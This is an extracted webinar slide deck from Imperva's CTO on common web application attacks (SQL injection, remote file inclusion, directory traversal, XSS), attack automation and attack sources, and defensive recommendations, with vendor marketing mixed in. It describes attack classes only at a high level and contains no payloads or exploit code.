Post on 21-May-2015
description
The State of Application Security:What Hackers Break
Amichai Shulman, CTO, Imperva
Agenda
The current state of Web vulnerabilities
Studying hackers
+ Why? Prioritizing defenses
+ How? Methodology
Analyzing real-life attack traffic
+ Key findings
+ Take-aways
Technical recommendations
2
Imperva Overview
Imperva’s mission is simple:Protect the data that drives business
The leader in a new category:Data Security
HQ in Redwood Shores CA; Global Presence
+ Installed in 50+ Countries
1,200+ direct customers; 25,000+ cloud users
+ 3 of the top 5 US banks
+ 3 of the top 10 financial services firms
+ 3 of the top 5 Telecoms
+ 2 of the top 5 food & drug stores
+ 3 of the top 5 specialty retailers
+ Hundreds of small and medium businesses
3
Today’s Presenter
Amichai Shulman – CTO Imperva
Speaker at industry events
+ RSA, Sybase Techwave, Info Security UK, Black Hat
Lecturer on Info Security
+ Technion - Israel Institute of Technology
Former security consultant to banks and financial services firms
Leads the Application Defense Center (ADC)
+ Discovered over 20 commercial application vulnerabilities
– Credited by Oracle, MS-SQL, IBM and others
Amichai Shulman one of InfoWorld’s “Top 25 CTOs”
WhiteHat Security Top Ten—2010
Percentage likelihood of a website having at least one vulnerability sorted by class
The Situation Today
:
:
# of websites(estimated: July 2011)
# ofvulnerabilities
357,292,065
230x
1%
821,771,600vulnerabilities in active circulation
The Situation Today
:
:
# of websites(estimated: July 2011)
# ofvulnerabilities
357,292,065
230x
1%
821,771,600vulnerabilities in active circulation
But which will be exploited?
Studying Hackers
Focus on actual threats
+ Focus on what hackers want, helping good guys prioritize
+ Technical insight into hacker activity
+ Business trends of hacker activity
+ Future directions of hacker activity
Eliminate uncertainties
+ Active attack sources
+ Explicit attack vectors
+ Spam content
Devise new defenses based on real data
+ Reduce guess work
Understanding the Threat Landscape: Methodology
Analyze hacker tools and activity
Tap into hacker forums
Record and monitor hacker activity
+ Categorized attacks across 30 applications
+ Monitored TOR traffic
+ Recorded over 10M suspicious requests
+ 6 months: December 2010-May 2011
Lesson #1: Automation is Prevailing
Attacks are automated
+ Botnets
+ Mass SQL Injection attacks
+ Google dorks
Lesson #1: Automation is Prevailing
Tools and kits exist for everything
Lesson #1: Automation is Prevailing
On Average: 27 attacks per hour ≈ 1 attack per 2 min.
Apps under automated attack:25,000 attacks per hour.≈ 7 per second
Lesson #1: Automation is Prevailing
On Average:
27 attacks per hour
≈ 1 attack per 2 minutes
Apps under automated attack:25,000 attacks per hour.≈ 7 per second
Take-away:Get ready to fight automation
Lesson #2: The ―Unfab‖ Four
Lesson #2A: The ―Unfab‖ FourSQL Injection
Lesson #2B: The ―Unfab‖ FourRemote File Inclusion
Lesson #2B: The ―Unfab‖ FourRemote File Inclusion
Analyzing the parameters and source of an RFI attack enhances common signature-based attack detection.
Lesson #2C: The ―Unfab‖ FourDirectory Traversal
Lesson #2C: The ―Unfab‖ FourDirectory Traversal
Lesson #2D: The ―Unfab‖ FourCross Site Scripting
Lesson #2D: The ―Unfab‖ FourCross Site Scripting
Lesson #2D: The ―Unfab‖ FourCross Site Scripting – Zooming into Search Engine Poisoning
http://HighRankingWebSite+PopularKeywords+XSS
…http://HighRankingWebSite+PopularKeywords+XSS
Lesson #2D: The ―Unfab‖ FourCross Site Scripting
New Search Engine Indexing Cycle
Lesson #2: The ―Unfab‖ Four
Take-away:Protect against these common attacks
These may seem obvious common attacks, but RFI and DT do not even appear in OWASP’s top 10 list.
Directory Traversal Missing from OWASP Top 10?
OWASP Rationale:
Directory traversal is covered in the OWASP Top Ten 2010 through the more general case, A4, Insecure Direct Object Reference.
―Insecure Direct Object Reference‖ is different than ―Directory Traversal‖ because in the latter access is made to a resource that, to begin with, should not have been available through the application.
Remote File Inclusion Missing from OWASP Top 10?
A3, OWASP Top 10 2007 - Malicious File Execution. Removed in the OWASP Top 10 2010.
OWASP Rationale:
REMOVED: A3 – Malicious File Execution. This is still a significant problem in many different environments. However, its prevalence in 2007 was inflated by large numbers of PHP applications having this problem. PHP now ships with a more secure configuration by default, lowering the prevalence of this problem.
Lesson #3: The U.S. is the Source of Most Attacks
We witnessed 29% of attack events originating from 10 sources.
Lesson #3: The U.S. is the Source of Most Attacks
Take-away:Sort traffic based on reputation
We witnessed 29% of attack events originating from 10 sources.
Organizations like these Funded a $27B Security Market in 2010…
…All had major breaches in 2011. What’s wrong?
Threat vs. Spending Market Dislocation
1 2011 Data Breach Investigations Report (Verizon RISK Team in conjunction with the US Secret Service & Dutch High Tech Crime Unit)2 Worldwide Security Products 2011-2014 Forecast (IDC - February 2011)
In 2010, 76% of all data
breached was from servers
and applications1
―
‖
Threats Spending
Yet well over 90% of the $27 billion spent on security
products was on traditional
security2
―
‖
The data theft industry is estimated at $1 trillion annually
Organized crime is responsible for 85% of data breaches 1
Summary
Deploy security solutions that deter automated attacks
Detect known vulnerability attacks
Acquire intelligence on malicious sources and apply it in real time
Participate in a security community and share data on attacks
Summary
―Foreknowledge cannot be gotten from ghosts and spirits, cannot be had by analogy, cannot be found out by calculation. It must be obtained from people, people who know the conditions of the enemy‖ 1
1 Sun Tzu – The art of war
Usage
Audit
Access
Control
Rights
Management
Attack
Protection
Reputation
Controls
Virtual
Patching
Imperva: Our Story in 60 Seconds
Webinar Materials
Post-Webinar Discussions
Answers to Attendee Questions
Webinar Recording Link
Much more…
Get LinkedIn to Imperva Data Security Direct for…
Questions
- CONFIDENTIAL -
Thank You
- CONFIDENTIAL -